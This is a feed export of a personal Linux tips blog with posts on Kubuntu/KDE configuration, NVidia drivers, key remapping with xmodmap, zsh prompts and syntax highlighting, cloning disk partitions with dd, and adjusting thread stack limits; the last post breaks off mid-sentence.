* bin:*:9797:0:::::
* ftp:*:9797:0:::::
* sshd:*:9797:0:::::
* ......
* </snipped for privacy>
*
* <*** End /etc/shadow file ***>
*
* root@vortex:~/test#
*
* Server Side View:
*
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p
1234
* Using configuration: ../musicd.conf
* [Mon May 17 05:26:07 2004] cmd_set() called
* Binding to port 5555.
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port
1234.
* [Mon May 17 05:26:11 2004] New connection!
* [Mon May 17 05:26:11 2004] cmd_load() called
* [Mon May 17 05:26:13 2004] cmd_show() called
* [Mon May 17 05:26:20 2004] Client lost.
*
*
* As you can see, it simply makes a connection, sends the commands, and
* leaves. MusicDaemon doesn't even log that new connection's IPs that I
* know of. Works very well, eh? :)
*
* The vulnerability is in where the is no authenciation for 1. For 2, it
* will let you "LOAD" any file on the box if you have the correct
privledges,
* and by default, as I said before, it runs as root, unless you change the
* configuration file to make it run as a different user.
*
* After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab
* the contents of the actual file. You can subtitute any file you want in
* for /etc/shadow, I just coded it to grab it because it being such an
* important system file if you know what I mean ;).
*
* As for the DoS, if you "LOAD" any binary on the system, then use
"SHOWLIST",
* it will crash music daemon.
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[]) {
char buffer[16384];
char *xpldata1 = "LOAD /etc/shadow\r\n";
char *xpldata2 = "SHOWLIST\r\n";
char *xpldata3 = "CLEAR\r\n";
char *dosdata1 = "LOAD /bin/cat\r\n";
char *dosdata2 = "SHOWLIST\r\n";
char *dosdata3 = "CLEAR\r\n";
int len1 = strlen(xpldata1);
int len2 = strlen(xpldata2);
int len3 = strlen(xpldata3);
int len4 = strlen(dosdata1);
int len5 = strlen(dosdata2);
int len6 = strlen(dosdata3);
if(argc != 4) {
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
Stealer / DoS");
printf("\nDiscovered and Coded by: Tal0n
05-22-04\n");
printf("\nUsage: %s <host> <port> <option>\n",
argv[0]);
printf("\nOptions:");
printf("\n\t\tshadow - Steal /etc/shadow file");
printf("\n\t\tdos - DoS Music Daemon\n\n");
return 0; }
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
Stealer / DoS\n\n");
int sock;
struct sockaddr_in remote;
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[2]));
remote.sin_addr.s_addr = inet_addr(argv[1]);
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\nError: Can't create socket!\n\n");
return -1; }
if(connect(sock,(struct sockaddr *)&remote,
sizeof(struct sockaddr)) < 0) {
printf("\nError: Can't connect to %s:%s!\n\n",
argv[1], argv[2]);
return -1; }
printf("Connected to %s:%s...\n", argv[1], argv[2]);
if(strcmp(argv[3], "dos") == 0) {
printf("Sending DoS data...\n");
send(sock, dosdata1, len4, 0);
sleep(2);
send(sock, dosdata2, len5, 0);
sleep(2);
send(sock, dosdata3, len6, 0);
printf("\nTarget %s DoS'd!\n\n", argv[1]);
return 0; }
if(strcmp(argv[3], "shadow") == 0) {
printf("Sending exploit data...\n");
send(sock, xpldata1, len1, 0);
sleep(2);
send(sock, xpldata2, len2, 0);
sleep(5);
printf("Done! Grabbing /etc/shadow...\n");
memset(buffer, 0, sizeof(buffer));
read(sock, buffer, sizeof(buffer));
sleep(2);
printf("\n<*** /etc/shadow file from %s ***>\n\n",
argv[1]);
printf("%s", buffer);
printf("\n<*** End /etc/shadow file ***>\n\n");
send(sock, xpldata3, len3, 0);
sleep(1);
close(sock);
return 0; }
return 0; }
ADDITIONAL INFORMATION
The information has been provided by Tal0] NtRegmon Local Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
|
http://www.derkeiler.com/Mailing-Lists/Securiteam/2004-08/0088.html
|
CC-MAIN-2015-32
|
refinedweb
| 948
| 56.15
|
We make things faster...
If you've tried to build an OpenMP application and seen this error dialog pop-up: "This application has failed to start because vcompd.dll was not found." then you've come to the right place.
It turns out that due to vcomp(d).lib being a pure import lib it doesn't have a manifest in it. So to get the manifest for vcomp(d).dll we put it in omp.h. In fact if you look in omp.h, starting with this line, #if !defined(_OPENMP_NOFORCE_MANIFEST), you will see where we do the manifest generation.
This requires the programmer to include omp.h even in cases where they're only using OpenMP pragmas. Should only be five seconds worth of work, although more than five seconds worth of work to figure out what the problem was. Hopefully this blog has all of the keywords one might search if they run across this issue.
If you would like to receive an email when updates are made to this post, please register here
RSS
Solution to the message "This application has failed to start because vcompd.dll was not found. Re-installing the application may fix this problem." when creating openmp applications with Visual Studio 2005
Greate!! It's help me very much.
I already got into trouble, thought visual studio's installation got corrupted.
Thanks for the solution to the problem.
Very helpful! Now if you could only help me solve my multi-threading issues. :-)
Me too, me too! This turned what would certainly be a few hours of work into a simple fix.
Hello, [visual studio 2008]
if using a configuration like:
app with _DEBUG defined (debug version) and Multithreaded DLL (release version of the runtime) you must include <omp.h> like this:
#undef _DEBUG
#include <omp.h>
#define _DEBUG
Thanks a lot, it was a great deal of help
Thanks for help!!!! Was starting to be pissed with it :D
I was having this problem even though I had included the #include <omp.h> as part of my headers. What fixed it was moving the omp include statement at the end of all my other includes. Before, it had been the first include.
PingBack from
|
http://blogs.msdn.com/kangsu/archive/2005/10/24/484462.aspx
|
crawl-002
|
refinedweb
| 372
| 77.33
|
Bars¶
Download this notebook from GitHub (right-click to download).
import numpy as np import holoviews as hv hv.extension('matplotlib')
The
Bars Element uses bars to show discrete, numerical comparisons across categories. One axis of the chart shows the specific categories being compared and the other axis represents a continuous value.
Bars may also be stacked by supplying a second key dimensions representing sub-categories. Therefore the
Bars Element expects a tabular data format with one or two key dimensions and one value dimension. See the Tabular Datasets user guide for supported data formats, which include arrays, pandas dataframes and dictionaries of arrays.
data = [('one',8),('two', 10), ('three', 16), ('four', 8), ('five', 4), ('six', 1)] bars = hv.Bars(data, hv.Dimension('Car occupants'), 'Count') bars
You can 'slice' a
Bars element by selecting categories as follows:
bars[['one', 'two', 'three']] + bars[['four', 'five', 'six']]
Bars support stacking just like the
Area element as well as grouping by a second key dimension. When declaring a second key dimension
Bars will visualize it as groupd bars by default to activate stacking instead set the
stacked=True option:
from itertools import product np.random.seed(3) index, groups = ['A', 'B'], ['a', 'b'] keys = product(index, groups) bars = hv.Bars([k+(np.random.rand()*100.,) for k in keys], ['Index', 'Group'], 'Count') grouped = bars.relabel('Grouped') stacked = bars.relabel('Stacked') grouped + stacked.opts(stacked=True)
For full documentation and the available style and plot options, use
hv.help(hv.Bars).
Download this notebook from GitHub (right-click to download).
|
https://holoviews.org/reference/elements/matplotlib/Bars.html
|
CC-MAIN-2019-51
|
refinedweb
| 257
| 57.37
|
Thanks for submitting this feedback. Microsoft.Owin package underwent some re-factoring post preview based on feedback. The class 'IntegratedPipelineExtensions' which contains the UseStagemarker() extension was moved to the namespace Microsoft.Owin.Extensions based on feedback. The aspnet identity package (preview) - trying to use the UseStageMarker() - has a dependency on the preview version of Microsoft.Owin.
To resolve this issue try one of the following:
1. Update all the packages including the *aspnet.Identity* packages – You will still have to fix up any template code changes made in RC by yourself.
2.[Recommended]: Use VS 2013 RC to create projects. By this way you automatically get the template code changes done to accommodate katana changes as well as RC version of all packages.
After fixing all the references pointing to the right location, I can't repro the issue.
Visual studio will fallback reference path to bin folder if he can find a dll with same name. I guess the issue is that your bin folder has some old version files and VS can still compile with them. Please manually remove bin folder in your web project before your next try.
|
https://connect.microsoft.com/VisualStudio/feedback/details/801735/could-not-load-type-owin-integratedpipelineextensions-from-assembly-microsoft-owin-version-2-0-0-0-culture-neutral-publickeytoken-31bf3856ad364e35
|
CC-MAIN-2015-11
|
refinedweb
| 191
| 58.18
|
Training deep learning models is known to be a time consuming and technically involved task. But if you want to create Deep Learning models for Apple devices, it is super easy now with their new CreateML framework introduced at the WWDC 2018.
You do not have to be a Machine Learning expert to train and make your own deep learning based image classifier or an object detector. In this tutorial, we will see how to make a custom multi-class image classifier using CreateML in Xcode in minutes in macOS.
We need macOS Mojave and above(10.14+) and XCode 10.0+. If you would like to deploy the model to an iOS app, you would need iOS 12.0+.
Benefits of using CreateML
There are several benefits of using CreateML for image classification and object detection tasks.
- Ease of use: Apple has made it very easy for developers without machine learning experience to create models.
- Speed: CreateML uses hardware acceleration to significantly speed up training and inference times. You can train a dataset of a few hundred images in seconds and a few thousand images in minutes rather than multiple hours.
- Size: When you train a deep learning model on a GPU, you either use a network like Mobilenet or you use a larger network and apply pruning and quantization to reduce their size (MB) and make them run fast on mobile devices. These models can be a few megabytes to sometimes a hundred megabytes. That’s not cool if you want to use it in your mobile application. CreateML takes care of all those details under the hood and produces a model that is just a few kilobytes in size!
- Train once, use on all Apple devices: The model trained using CreateML can be integrated into iOS, macOS, tvOS and watchOS using CoreML.
Transfer Learning
You may have heard that a Neural Network is data hungry — it takes thousands, if not millions of data points to train one. How come CreateML requires only a few hundred images? The short answer is Transfer Learning.
In Transfer Learning, we use the architecture and weights of a pre-trained model which is usually trained on a large dataset for a different task. With this pre-trained model as the base, in Transfer Learning we change only the final output layers to suit the task at hand. We do not have to retrain the entire network for our own classification problem. This vastly speeds up the training process and also requires a much smaller dataset. For example, we could use a pre-trained ResNet model that has already been trained on a large dataset like ImageNet for 1000 categories using a dataset of more than a million images.
Apple uses this concept of transfer learning to let its users make custom deep learning based image.
Scene Print : Apple’s tiny pre-trained model
A pre-trained ResNet model — a popular architecture — when exported as a CoreML exported model file is about 90MB. Another popular model for mobile devices called SqueezeNet is around 5 MB.
In comparison, Apple’s own pre-trained model called scenePrint is just around 40KB!
How is that possible?
Psst… Apple is cheating! Well sorta. Remember, it owns the operating systems macOS, iOS, tvOS and watchOS, and the pre-trained model is bundled with the OS. Only the weights of the last layer need to be bundled with your app and that is why the size is tiny.
What about the accuracy?
The performance is slightly inferior to ResNet and slightly better than SqueezeNet. More importantly, it is better than human level accuracy! Apple provides a comparison of the same here.
Does it use the GPU?
This Vision model is already optimized for the hardware in Apple’s devices and uses GPU acceleration. It is available in macOS 10.14+ and Xcode 10.0+ SDKs.
Training a Custom Image Classifier using CreateML
Let’s see how to use the new scene print feature extractor model and train our own classifier in a MacBook Pro.
The experiments below are based on my mid-2015 MacBook Pro which has
- Processor: 2.5 GHz Intel Core i7 processor.
- GPU: AMD Radeon R9 M370X with 2048 MB VRAM.
You can see the GPU being used using the Activity monitor during training and inference.
That feels so good! Usually, because newer Macs do not have an NVIDIA GPU, we never train deep learning models on a Mac. But with CreateML, there is no need for a remote machine or cloud computing to do the heavy lifting GPU work to do some basic deep learning experiments!
The network in the model takes in images of size 299×299. So its advisable to use images of a size larger than that, otherwise the image would be upscaled before being fed to the network and it might lead to lower accuracy.
Dataset Preparation
In this post, we will show you how to build a multi-class classifier that can classify 10 different kinds of animals.
We will use the CalTech256 dataset. The dataset has 30,607 images categorized into 256 different labeled classes along with another ‘clutter’ class.
Training the whole dataset will take around 3 hours, so we will work on a subset of the dataset containing 10 animals – bear, chimp, giraffe, gorilla, llama, ostrich, porcupine, skunk, triceratops and zebra.
The number of images in these folders varies from 81(for skunk) to 212(for gorilla). We use the first 60 images in each of these categories for training and the rest for testing in our experiments below.
If you want to replicate the experiments, please follow the steps below
- Download the CalTech256 dataset
- Create two directories with names train.
- Copy the remaning images for bear (i.e. the ones not included in training set) to the directory test/bear. Repeat this for every animal.
Build and Analyze an Image Classifier in XCode
Now that our dataset is ready, we can follow the steps below to build an image classifier.
Step 1 : Open the Classifier Builder
Open Xcode (10.0+) and open a new playground using File->New->Playground. While doing so, choose a macOS Blank template.
Make sure the Assistant Editor is open in the right. Type the following in the main playground editor and hit Shift+Enter to run it.
import CreateMLUI let builder = MLImageClassifierBuilder() builder.showInLiveView()
When this executes, the image classifier builder shows up in the right in the Assistant Editor.
Step 2 : Training
Click on the drop-down next to the ImageClassifier, and set the Max Iterations to 20. For smaller datasets, this might lead to overfitting, but for the size we are working on now, it should be fine. Then drag and drop the training folder train to the area labeled as ‘Drop Images to Begin Training’ under the ImageClassifier.
You will see that it would start training. It first extracts the feature vectors for all the images. This is the most time-consuming part of this process and it does use the GPU. The extracted vectors are then used in the training iterations to predict the class probability for each image. As the training is carried out, it prints out the time spent on training, the training accuracy and the validation accuracy after each iteration.
Step 3 : Testing
Next, we need to check the accuracy on our test images. Drag and drop the test image folder into the area labeled ‘Drop Images to Begin Testing’ in the Assistant Editor.
CreateML then extracts the feature vector for each of the training images and classifies them.
As we can see above, it processed 509 images in 1m 36s !
The final evaluation accuracy across all the test instances of all the 10 classes is 82% as shown in the Live view in the Assistant editor. It also shows the predicted and true class belonging to each test instance. You can scroll down the test instances to see the output for each of them.
Confusion Matrix
Confusion Matrix gives an idea of the performance of the classification model over various classes. An entry (i,j) in the confusion matrix shows how many instances of class i is predicted as belonging to class j. Ideally, all the non-zero numbers should be along the diagonal of the matrix, if there is zero error. Below is the confusion matrix in our evaluation.
As we can see the biggest confusion is classifying the gorilla as the chimp, which is kind of reasonable here as they are the closest animals in terms of appearance. Some chimps are also classified as gorillas, but there are more gorillas in the test set than chimps.
The next big one in the confusion matrix is that some of the bears are classified as chimps. This could be an indication that the classifier needs more images of bears.
Precision and Recall
Precision for a class is the fraction of instances correctly predicted as belonging to the class over all the instances predicted as belonging to the class. If we see below, it is 100% for the llama and bear categories. So each test instance predicted to be llama is actually a llama, and each instance predicted as a bear is a bear too.
Recall is the fraction of the number of instances correctly predicted as belonging to the class over all the instances actually belonging to the class. In our example, we got a 100% recall for multiple categories – giraffe, skunk, triceratops and zebra. So all the test instances belonging to these categories got classified correctly.
Inference by Users
Apple’s CoreML framework lets the users do on-device inference using the models created using CreateML. This helps retain user’s privacy and does not need any internet connection as needed by the apps using web-based inference.
We will not go into the details of creating an app for inference by a user in this post, but Apple provides very good documentation of the same for building an iOS app using its Vision and CoreML models with sample code here.
You could also build an iOS app doing real-time image classification with ARKit. Its sample code is here
One thing to keep in mind while building your own app with a custom model is that the scenePrint model works best if the source of your training data matches the source of the images you want to classify. For example, if your app classifies images captured with an iPhone camera, train your model using images captured the same way, whenever possible.
References
Griffin, G. Holub, AD. Perona, P. The Caltech 256. Caltech Technical Report.
Introducing Create ML by Apple at WWDC 2018
Image Classifier User Guide
Subscribe & Download Code
If you liked this article, please subscribe to our newsletter. You will also receive a free Computer Vision Resource Guide. In our newsletter, we share OpenCV tutorials and examples written in C++/Python, and Computer Vision and Machine Learning algorithms and news.
|
https://learnopencv.com/how-to-train-a-deep-learning-based-image-classifier-in-macos/
|
CC-MAIN-2022-21
|
refinedweb
| 1,830
| 63.29
|
Hi
View Complete Post
View Complete Post try to add some Zip functionality of my website. I use DotNetZip from Codeplex. It works without any problem in my Development Machine (Windows XP). So I upload the files to the WebServer. Now I am getting the following error.
Compiler Error Message: CS0246: The type or namespace name 'Ionic' could not be found (are you missing a using directive or an assembly reference?)
How can I debug it. Please help me. f
I keep getting the error: Error message: CS0101: The namespace '<global namespace>' already contains a definition for 'checkvalue'.
Then, I rename the Inherits from the @page directive in both the .aspx and .aspx.cs pages and it works!
My website has only 2 pages, and both use the same class (same class name, exactly same syntax) but it has been copied and pasted and the 2 aspx pages (and aspx.cs pages) are not referencing each other.
In other words, both aspx.cs pages (called page1.aspx.cs and page2.aspx.cs) has the class
public class CheckValue { //content return true; }
Both the aspx pages reference the 'inherits' files seperately:
<%@ Page Language="C#" CodeFile="page1.aspx.cs" Inherits="_1" %>
and my code behind
public partial class _1 : System.Web.UI.Page
and for my second page
<%@ Page Language="C#" CodeFile="page2.aspx.cs" Inherits="_2" %>
and my code behind
public partial class _2 : System.Web.UI.Page
I don't use the .resx file.
Why does this error happen some times, and not other times?
Dave
I would like to create a class that extends my ErrorData class, i have not done this in a while and when i try class ErrorDataASPX : ExceptionHandler.ErrorData and build i get msg:
Error 1 The type or namespace name 'ErrorData' does not exist in the namespace 'ExceptionHandler' (are you missing an assembly reference?) C:\ExceptionHandling\ExceptionHandler\ErrorDataASPX.cs 9 44 ExceptionHandler
namespace ExceptionHandler{ class ErrorDataASPX : ExceptionHandler.ErrorData
namespace ExceptionHandling{ using System; using System.Globalization; using System.Text; using System.Web;
/// <summary> /// Contains information about an error. /// </summary> public class ErrorData {
ÃÂ
I am trying to execute a application definition file through webpart .The filter has to be done based on UserID which is of Type Int64.
But it gives error as "A Wildcard filter requires a TypeDescriptor that resolves to a String:
Hence i tried to change the Filter descriptor to type Comparison and exactMatch ,Even then it did not work.
Following is the app def file
<?
<
|
http://www.dotnetspark.com/links/41935-error-2-type-namespace-definition-end-of-file.aspx
|
CC-MAIN-2018-13
|
refinedweb
| 414
| 59.8
|
tag:blogger.com,1999:blog-22570941048510868432018-09-28T09:51:25.787+10:00Manki’s Linux TipsSome tiny nifty ways I have configured my Ubuntu machine to improve my productivity.Muthu Kannannoreply@blogger.comBlogger34125tag:blogger.com,1999:blog-2257094104851086843.post-90591315576036304752016-04-05T15:19:00.001+10:002016-04-05T15:19:12.194+10:00Ubuntu on Lenovo P50: using NVidia proprietary drivers<div dir="ltr" style="text-align: left;" trbidi="on">I managed to dual boot Ubuntu (Kubuntu 14.04, actually) on my shiny new Lenovo P50. With the default Nouveau driver, the experience left a lot to be desired. Graphics performance was slow and suspend-resume worked only once. For every boot, suspend will work once. After that, suspending will do nothing—the machine will just stay on forever.<br /><br />I followed the prompts to install the proprietary drivers, which didn’t really help. After installing the drivers, X would simply not start. So I had to revert to the open source Nouveau driver. (You’d do this by getting a root shell from recovery boot and purging all Nvidia packages.)<br /><br />Today, as a wild guess, I decided to install the proprietary driver and disable the Intel GPU altogether. (You’d do this by choosing Discrete Only option in BIOS display settings. The default is Hybrid, which keeps both Intel and NVidia GPUs active.) Maybe that could help, I thought, and to my surprise it did work. Graphics is now fast, and suspend-resume works too. Initial display of LightDM and logging into KDE are a bit slow, but everything else is nice and snappy.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan Apple WWDC keynote video in Linux<div dir="ltr" style="text-align: left;" trbidi="on">Make your browser lie to apple.com that you’re using a Windows machine. I made my Chrome to use the UserAgent string of Firefox on Windows. The video player loaded. Ubuntu seems to have a QuickTime plugin installed, so the video just played.<br /><br />To change UserAgent of Chrome (i.e. to make Chrome pretend it’s Firefox running on Windows), open <i>Menu > Tools > Developer Tools</i>. Click on the Gear icon at the bottom-right corner and select UserAgent checkbox.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="" width="530" /></a></div><br /></div><img src="" height="1" width="1" alt=""/>Muthu Kannan GTK mouse cursor in KDE?<div dir="ltr" style="text-align: left;" trbidi="on">If you have upgraded to Kubuntu 12.10, you’d notice that <a href="">KDM</a> has been replaced with <a href="">LightDM</a>. LightDM looks pretty, but somehow doesn’t play well with KDE. One annoying issue I have noticed is that GTK applications run in KDE use GTK mouse cursor under certain circumstances. When Chrome shows a menu, the mouse cursor changes to a GTK one and it looks jarring. Turns out, there’s a fix for that.<br /><br />1. Install LightDM KDE greeter<br /><pre><code>sudo apt-get install lightdm-kde-greeter</code></pre>2. Make LightDM use KDE greeter, and all will be well again. To do that, edit the file <code>/etc/lightdm/lightdm.conf</code> and change the value of <code>greeter-session</code>. The file will look something like this after the change. (Boldface text is the change you’d have to make.)<br /><pre><code>[SeatDefaults]<br />greeter-session=<b>lightdm-kde-greeter</b><br />user-session=ubuntu</code></pre>3. Save the file and test your changes by running LightDM in test mode:<br /><pre><code>lightdm --test-mode</code></pre>If LightDM doesn’t open correctly, check if you have made any typing errors in the config file. If you cannot fix the issue, just restore the file as it was before you edited; you’ll still have the ugly mouse cursor issue, but at least your computer will continue to work.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan Windows (aka Super) key to Escape<div dir="ltr" style="text-align: left;" trbidi="on">Did you know I have mapped Caps Lock on my computer to <a href="">open a new browser tab</a>? Only today I figured my Vim sessions can be a lot better if I mapped ‘Windows’ key (aka Super key) to Escape. It can be done by adding a single line to your <code>~/.Xmodmap</code> file:<br /><pre><code>! Map left Windows key to Escape.<br />keysym Super_L = Escape</code></pre>(Okay, that was <em>two</em> lines, but a little comment in obscure configuration files can be very helpful.)<br /><br />Also, if you don’t feel like logging out and logging back in after these changes (or if you want to try the change before touching your config file), you can run this on a terminal to have the keybinding take effect immediately:<br /><pre><code>xmodmap -e 'keysym Super_L = Escape'</code></pre></div><img src="" height="1" width="1" alt=""/>Muthu Kannan fonts in KDE<div dir="ltr" style="text-align: left;" trbidi="on">If you’re a KDE user and have always envied Gnome for its font rendering (especially with fonts like Ubuntu and Ubuntu Mono), read on.<br /><br />All you need to do is select ‘Enabled’ for <i>System Settings > Application Appearance > Fonts > Use anti-aliasing</i>. Click on the <i>Configure</i> button and set <i>Hinting style</i> to ‘Slight’. If you like <a href="">ClearType</a> style font rendering, enable subpixel rendering too.<br /><br />Any program that’s opened after this change will use the new font rendering settings. So you may want to restart your open apps or logout and log back in.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan Ubuntu menu proxy when not using Unity<div dir="ltr" style="text-align: left;" trbidi="on">Does seeing messages like this on your terminal annoy you?<br /><pre><code>** (gvim:8016): WARNING **: Unable to create Ubuntu Menu Proxy: Timeout was reached</code></pre>It sure does annoy me. Turns out, it’s because the app you’re running is trying to connect its menus to Unity’s “global menu” (or whatever that’s called). The way to fix this problem would be to disable Unity menu proxy when you’re not using Unity. Add this to your shell’s startup script (<code>.bashrc</code>, <code>.zshrc</code>, etc):<br /><pre><code>if [[ $DESKTOP_SESSION != "ubuntu" && $DESKTOP_SESSION != "ubuntu-2d" ]]<br />then<br /> export UBUNTU_MENUPROXY=0<br />fi</code></pre></div><img src="" height="1" width="1" alt=""/>Muthu Kannan zsh prompt string PS1<div dir="ltr" style="text-align: left;" trbidi="on">Every Unix user with a blog has a post about it: how they have configured their <a href="">PS1</a> so their command prompt is almost a mini dashboard that shows everything they’d need to know. I am no exception. Even if this post doesn’t really help others, bragging is gratifying, so I’d go on and show how awesome my PS1 is :)<br /><br />I have been using <a href="">zsh</a> for a while now, and I am quite happy with it. I’m a <a href="">sucker for colours</a> and I was annoyed that I couldn’t take full advantage of my 256 colour terminal because I just didn’t know how to. So I searched the web and found <a href="">two</a> <a href="">good</a> pages. Combined with some manual-reading I had done, I cooked up my shiny new PS1:<br /><pre><code>Kubuntu</a> on it. I almost never used Windows, but I had kept it on the disk anyway. Last week I thought of upgrading to an SSD, and bought a 240GB SSD. This post is to document how I copied over the Windows installation and recovery partition to the SSD before swapping the disks.<br /><br />I connected the SSD to my computer using an USB interface and ran <code>sudo fdisk -l</code> to see the partition tables of both disks. /></code></pre><code>/dev/sda</code> is the original hard disk that came with the laptop, and <code>/dev/sdb</code>, which is empty currently, is the new SSD. I have to clone the first 3 partitions (<code>/dev/sda1</code>, <code>/dev/sda2</code>, and <code>/dev/sda3</code>) bit-by-bit to retain all the preinstalled stuff — this includes Windows 7 installation and the recovery partition. Replicating the Windows partitions is the tricky part, so this post will describe that in detail. Copying data from Linux partitions can be done with a simple <code><a href=''>rsync</a></code>.<br /><br />The first step is to create partitions on the new disk that resemble the old disk. I followed the <a href=''>fdisk guide of TLDP</a> and created the first 3 partitions. Now <code>fdisk -l</code> shows this configuration: />/dev/sdb1 2048 31459327 15728640 27 Hidden NTFS WinRE<br />/dev/sdb2 * 31459328 31664127 102400 7 HPFS/NTFS/exFAT<br />/dev/sdb3 31664128 232622079 100478976 7 HPFS/NTFS/exFAT<br /></code></pre>The partitions in the new disk are of the same size and same type as in the old one. <code>/dev/sdb2</code> is bootable as is <code>/dev/sda2</code>. (It won’t boot yet though, since the disk has no OS yet.) Now to copy the data bits over. I first unmounted all three partitions. This is critical because changing data underneath when it’s being copied over is a darn good recipe for data corruption.<br /><br /><code>dd</code> is the low-level data copying utility I used to clone the partitions. Copying the data over was as simple as running these commands one by one. (Swapping <code>if</code> and <code>of</code> can result in wiping out all data from the old partition. <code>dd</code> cannot even know if you’re passing wrong arguments to it.)<br /><pre><code>% sudo dd if=/dev/sda1 of=/dev/sdb1 conv=notrunc<br />% sudo dd if=/dev/sda2 of=/dev/sdb2 conv=notrunc<br />% sudo dd if=/dev/sda3 of=/dev/sdb3 conv=notrunc</code></pre><br />Copying can be painfully slow since we are moving hundreds of GBs around. Blog O’ Matty has a post that shows how to <a href=''>find status of a running <code>dd</code> command</a>. Essentially you’d send <code>SIGUSR1</code> signal to the <code>dd</code> process and it’d print the current status of the transfer. One of the commenters suggests running <code>sudo pkill -SIGUSR1 dd</code> so that you don’t have to think about process IDs.<br /><br />Once this was done, I installed Kubuntu on the SSD using the standard installation process, and everything went just fine. Windows doesn’t boot probably because it thinks mine is a pirated copy. (Shows an error saying some ‘important’ hardware has gone missing.) But I can boot into the recovery partition, so I can restore factory settings to get Windows running again when I want it.<br /><br />I restored all my installed software from the <a href=''>package selection list</a> I had already generated. That’s it... the computer is exactly like it was before with all my programs and configuration.<img src="" height="1" width="1" alt=""/>Muthu Kannan stack size of Linux processes to reduce swappingSince upgrading to Kubuntu 11.10, my laptop has been slow. Slow because it’s been accessing the hard disk a lot. I incidentally opened <a href=''>system monitor</a> yesterday and found that more than 1GB of <a href=''>swapping space</a> was in use although only about 1.1GB of the total 2GB RAM was in use. That doesn’t sound right. The computer shouldn’t swap when about half of the RAM is unused.<br /><br />My friend <a href=''>Abhay</a> had once <a href=''>told me about thread stack size</a> configuration of Linux (Unix?) processes. This configuration specifies how much RAM is given to each thread for its stack. I ran the following command to see how much was the current stack size:<br /><pre><code>% ulimit -s<br />8192</code></pre>That’s 8192KB allocated for each thread. With some Googling around I figured this was a huge number. <a href=''>Windows allocates only 1MB</a> by default. For a machine that’s low on RAM like mine, 8MB for stack is ludicrous. I decided to make it 2MB instead. Unsurprisingly, I wasn’t the first to try to do something like this; a <a href=''>thread on LinuxQuestions.org</a> explained that I can edit <a href=''><code>/etc/security/limits.conf</code></a> to set the default size.<br /><br />I added the following lines to my <code>/etc/security/limits.conf</code>:<br /><pre><code>* soft stack 2048<br />* hard stack 2048</code></pre>(Only <code>root</code> can modify this file; you’ll need to use <code>sudo</code>.) To apply the configuration changes I restarted the machine. After restarting, now my machine is using about 1.4GB of RAM and about 80MB of swap. No need to mention, everything is fast as it used be.<img src="" height="1" width="1" alt=""/>Muthu Kannan new browser tab when Caps Lock key is pressedAfter using a <a href="">Chromebook</a> for a while, I realised how useful mapping Caps Lock key to opening a new browser tab can be. Of course, it’s possible to set up key bindings to achieve this in Linux.<br /><br />First, I set up <code>.Xmodmap</code> so that pressing Caps Lock is interpreted as the same as pressing Calculator key on my multimedia keyboard. I chose Calculator key because it doesn’t currently do anything, and I don’t use it at all. I added the following lines to my <code>~/.Xmodmap</code> file.<br /><pre><code>remove Lock = Caps_Lock<br />keysym Caps_Lock = XF86Calculator</code></pre>Now, pressing Caps Lock would be the same as pressing Calculator key.<br /><br />We need to make pressing Calculator key send <kbd>Ctrl+T</kbd> keystrokes instead. This can be done in KDE by defining a new global shortcut. In KDE 4.7, this is done by navigating to <em>System Settings > Shortcuts and Gestures > Custom Shortcuts</em>. Define a new <em>Command/URL</em> global shortcut. Use <kbd>Caps Lock</kbd> as the trigger shortcut (it would show as <em>Calculator</em> in the UI). Specify <pre><code>/usr/bin/xte "keydown Control_L" "key t" "keyup Control_L"</code></pre>as the command to run. (You’d have to install <a href=''>xte</a> if it isn’t already installed on your machine.) That’s it; now pressing <kbd>Caps Lock</kbd> anywhere within KDE would send <kbd>Ctrl+T</kbd> keystrokes instead.<br /><br />A few tips:<br /><ul><li>You can use <code>xmodmap -pk</code> command to see the list of all available keys.</li><li>Be sure to select a key that’s actually present on your keyboard; my laptop does not have a calculator key, so I am using the battery key instead. Any key that's present in the keyboard but not currently in use would do.</li><li>After you have modified your <code>~/.Xmodmap</code>, you’ll have to log out and log back in for the mappings to apply. Alternatively, you can apply the configuration to your current session from the command line, e.g. by running <code>xmodmap -e "remove Lock = Caps_Lock"</code>.</li></ul><img src="" height="1" width="1" alt=""/>Muthu Kannan syntax highlightingI like colours. I have aliased all frequently used commands like <code>ls</code>, <code>grep</code>, etc. by adding flags to show colours in the output. I have set my <code>PS1</code> in such a way that the prompt is in a different colour. It makes it easy for me to see where the prompt ends and the command starts. When I heard about <a href=''>fish</a>!<br /><br />All you have to do is download the code from <a href=''>zsh-syntax-highlighting</a> project and “source” it in your <code>.zshrc</code>. But I wasn’t happy with their defaults. By default this script underlines path names, but I hate underlining because it makes text less readable. I also didn’t like their choice of blue colour for <a href=''>globs</a>. On my black terminal, blue is hardly readable. Customising the formatting was easy too; I only had to change the value of a variable. This is what my .zshrc has now, and syntax highlighting works like a charm.<br /><pre><code>source ~/dload/src/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh<br />ZSH_HIGHLIGHT_STYLES[globbing]='fg=yellow'<br />ZSH_HIGHLIGHT_STYLES[path]='bold'<br /></code></pre>You can find the list of different syntax highlighting options in <a href=''>this file</a>.<img src="" height="1" width="1" alt=""/>Muthu Kannan scripts when any individual command failsLet’s say you have a script that builds a project, runs all tests, and pushes the binary to a staging/production server. If the build fails or a test fails you’d want the script to stop immediately. Pushing a binary that failed some tests is obviously wrong. You can check for a command’s return value using <code>if</code> and terminate your script. But doing that for every command in the script would make your script less readable and more prone to bugs.<br /><br />Shells provide a clean solution for this use case: you can set a script-level option to stop the script execution if any command you invoke from the script exits with a non-zero status. You do that in bash 